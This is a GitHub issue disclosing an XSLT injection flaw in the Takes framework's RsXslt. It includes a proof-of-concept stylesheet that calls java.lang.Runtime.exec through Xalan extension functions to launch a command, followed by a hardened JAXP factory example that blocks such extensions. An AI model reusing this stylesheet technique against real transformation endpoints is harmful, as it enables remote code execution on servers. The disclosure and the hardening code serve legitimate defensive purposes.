Takes framework has an XSLT injection vulnerability. #1293

Open
c1gar opened this issue Apr 19, 2024 · 0 comments


c1gar commented Apr 19, 2024

The Takes framework is vulnerable to XSLT injection due to the lack of secure parameters in the XSLT transformation function that comes with the Takes framework.
Below is an example code snippet and its effect.

```java
package org.example;

import org.apache.commons.io.IOUtils;
import org.cactoos.Text;
import org.cactoos.io.InputStreamOf;
import org.cactoos.text.Joined;
import org.takes.rs.RsText;
import org.takes.rs.RsXslt;

import javax.xml.transform.stream.StreamSource;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

public class SimpleTakesApp {
    public static void main(String[] args) throws IOException {
        // XML body carrying an xml-stylesheet PI; RsXslt resolves the href
        // through the URIResolver passed in below.
        final Text xml = new Joined(
            " ",
            "<?xml-stylesheet href='/a.xsl' type='text/xsl'?>",
            "<page><data>ура</data></page>"
        );
        // Stylesheet that reaches java.lang.Runtime through the Xalan "java/"
        // extension namespace. RsXslt builds its TransformerFactory without
        // FEATURE_SECURE_PROCESSING, so the processor executes the call.
        final Text xsl = new Joined(
            " ",
            "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\" xmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\">\n" +
            "   <xsl:template match=\"/\">\n" +
            "     <xsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"/>\n" +
            "     <xsl:variable name=\"process\" select=\"rt:exec($rtobject,'open -a Calculator')\"/>\n" +
            "     <xsl:variable name=\"processString\" select=\"ob:toString($process)\"/>\n" +
            "     <xsl:value-of select=\"$processString\"/>\n" +
            "   </xsl:template>\n" +
            " </xsl:stylesheet>"
        );
        // The resolver returns the stylesheet above for every href, so the
        // transformation applies it to the response body.
        String transformedValue = IOUtils.toString(
            new RsXslt(
                new RsText(new InputStreamOf(xml)),
                (href, base) -> new StreamSource(new InputStreamOf(xsl))
            ).body(),
            StandardCharsets.UTF_8
        );

        System.out.println(transformedValue);
    }
}
```

(Screenshot of the result was attached to the original issue; image not reproduced here.)
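For comparison, the following is an added example (not code from the issue author or from the Takes project) of the transformation factory settings the report says are missing. It uses only the JDK's JAXP API: it builds a `TransformerFactory` with `FEATURE_SECURE_PROCESSING` enabled and external DTD/stylesheet access closed, then compiles two constructed stylesheets: a benign one that must still work, and one that calls a Java extension function (a harmless `System.getProperty` through the same `xalan/java` namespace the report uses) and must be rejected. The class name `SecureXslt`, the helper names and the sample documents are this example's own; the rejection at `newTemplates` time is the behaviour of the JDK's built-in XSLTC processor, and third-party processors may differ, as noted in the comments.

```java
package org.example;

import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

/** Hardened XSLT setup: extension functions off, external fetches off. */
public final class SecureXslt {

    /** Factory configured with the secure settings (example helper, not Takes' API). */
    public static TransformerFactory secureFactory()
        throws TransformerConfigurationException {
        final TransformerFactory factory = TransformerFactory.newInstance();
        // In the JDK's XSLTC this disables Java extension functions such as
        // rt:exec(), so the stylesheet from the report no longer compiles.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Also refuse external DTDs and xsl:import/xsl:include/document() fetches.
        // Some third-party processors (e.g. older Xalan-J) reject these attribute
        // names with IllegalArgumentException; surface that instead of hiding it.
        for (final String attr : new String[] {
            XMLConstants.ACCESS_EXTERNAL_DTD,
            XMLConstants.ACCESS_EXTERNAL_STYLESHEET
        }) {
            try {
                factory.setAttribute(attr, "");
            } catch (final IllegalArgumentException unsupported) {
                System.err.println("processor does not support " + attr
                    + "; this processor cannot be locked down this way");
            }
        }
        return factory;
    }

    /** Compiles and applies the stylesheet; throws if the processor rejects it. */
    public static String transform(final String xml, final String xsl)
        throws TransformerException {
        final Templates templates = secureFactory()
            .newTemplates(new StreamSource(new StringReader(xsl)));
        final Transformer transformer = templates.newTransformer();
        final StringWriter out = new StringWriter();
        transformer.transform(
            new StreamSource(new StringReader(xml)), new StreamResult(out));
        return out.toString();
    }

    /** True when the secure factory refuses to compile the stylesheet. */
    public static boolean isRejected(final String xsl) {
        try {
            secureFactory().newTemplates(new StreamSource(new StringReader(xsl)));
            return false;
        } catch (final TransformerConfigurationException rejected) {
            return true;
        }
    }

    // Constructed sample input, not taken from any real application.
    static final String XML = "<page><data>hello</data></page>";

    // Ordinary stylesheet: must keep working after hardening.
    static final String BENIGN_XSL =
        "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">"
        + "<xsl:output method=\"text\"/>"
        + "<xsl:template match=\"/\"><xsl:value-of select=\"/page/data\"/></xsl:template>"
        + "</xsl:stylesheet>";

    // Stylesheet using the same Java extension mechanism as the report, with a
    // harmless call; the secure factory must refuse to compile it.
    static final String EXTENSION_XSL =
        "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
        + " xmlns:sys=\"http://xml.apache.org/xalan/java/java.lang.System\">"
        + "<xsl:output method=\"text\"/>"
        + "<xsl:template match=\"/\">"
        + "<xsl:value-of select=\"sys:getProperty('java.version')\"/>"
        + "</xsl:template></xsl:stylesheet>";

    public static void main(final String[] args) throws TransformerException {
        System.out.println("benign output: " + transform(XML, BENIGN_XSL));
        System.out.println("extension stylesheet rejected: " + isRejected(EXTENSION_XSL));
    }
}
```

The check that matters for a fix in `RsXslt` is the call to `setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` on the factory that compiles the resolved stylesheet; the `ACCESS_EXTERNAL_*` attributes close the separate path of a stylesheet pulling in remote content. Keep the `IllegalArgumentException` branch visible: a processor that silently ignores the attribute is exactly the situation in which the transformation still runs unrestricted.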
